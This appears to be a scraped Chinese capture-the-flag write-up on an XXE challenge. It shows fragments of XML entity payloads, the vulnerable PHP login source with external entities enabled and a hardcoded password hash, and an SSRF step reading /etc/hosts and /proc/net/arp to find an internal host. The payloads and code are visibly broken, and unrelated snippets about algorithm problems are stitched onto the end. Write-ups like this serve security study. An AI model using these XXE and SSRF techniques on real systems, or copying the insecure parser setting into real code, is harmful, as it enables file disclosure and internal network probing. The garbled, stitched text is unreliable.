f12檢視原始碼:
}可以看到傳輸的資料是xml型別
payload打一下:
<?xml version="1.0" encoding="utf-8"?>
]>
&xxe;
111
flag首先嘗試直接讀/flag檔案,回顯了報錯資訊,但是發現可以讀dologin檔案:
<?xml version="1.0" encoding="utf-8"?>
]>
&file;
1
<?php \n/**
* autor: c0ny1\n* date: 2018-2-7
*/$username = 'admin'; //\xe8\xb4\xa6\xe5\x8f\xb7
$password = '024b87931a03f738fff6693ce0a78c88'; //\xe5\xaf\x86\xe7\xa0\x81
$result = null;
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
tryelse
}catch(exception $e)
header('content-type: text/html; charset=utf-8');
echo $result;
?>
ssrf讀內網檔案:
// /etc/hosts
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
173.17.80.9 osrc
ip,173.17.80.9
// /proc/net/arp
ip address hw type flags hw address mask device
173.17.80.2 0x1 0x2 02:42:ad:11:50:02 * eth0
173.17.80.12 0x1 0x2 02:42:ad:11:50:0c * eth0
173.17.80.10可以得flag
兩道簡單的題目
第一次發表文章,就發表兩到簡單點的題目好了 第一道題目是這樣的 現在有乙個整數的陣列,然後給定乙個目標數,我們要做的是找出陣列中唯一存在的兩個不同的數,其相加能夠得到這個目標數,然後返回這兩個數的下標比如 given nums 2,7,11,15 target 9,because nums 0 nu...
今晚的兩道 bc
第一道題 beautiful palindrome number 簡單組合計數問題,手算打表就好 大概十五分鐘左右搞定 第一次 提交竟然 wa了一次 有乙個小小的坑在那。author jusonalien email jusonalien qq.com school south china norm...
兩道筆試題的感觸
今天做了兩道筆試題,收益良多。有些題,你會發現,雖然並不難,但是卻很容易沒有思路或者出錯,這都是源自平時的不求甚解。很多知識點,自以為已經掌握,其實只是管中窺豹,可見一斑。不要一味墨守成規,也要用於思考,很多東西既要知其然,也要知其所以然。我一直覺得了解和精通中間差著十萬八千里,看來還有很長一段路要...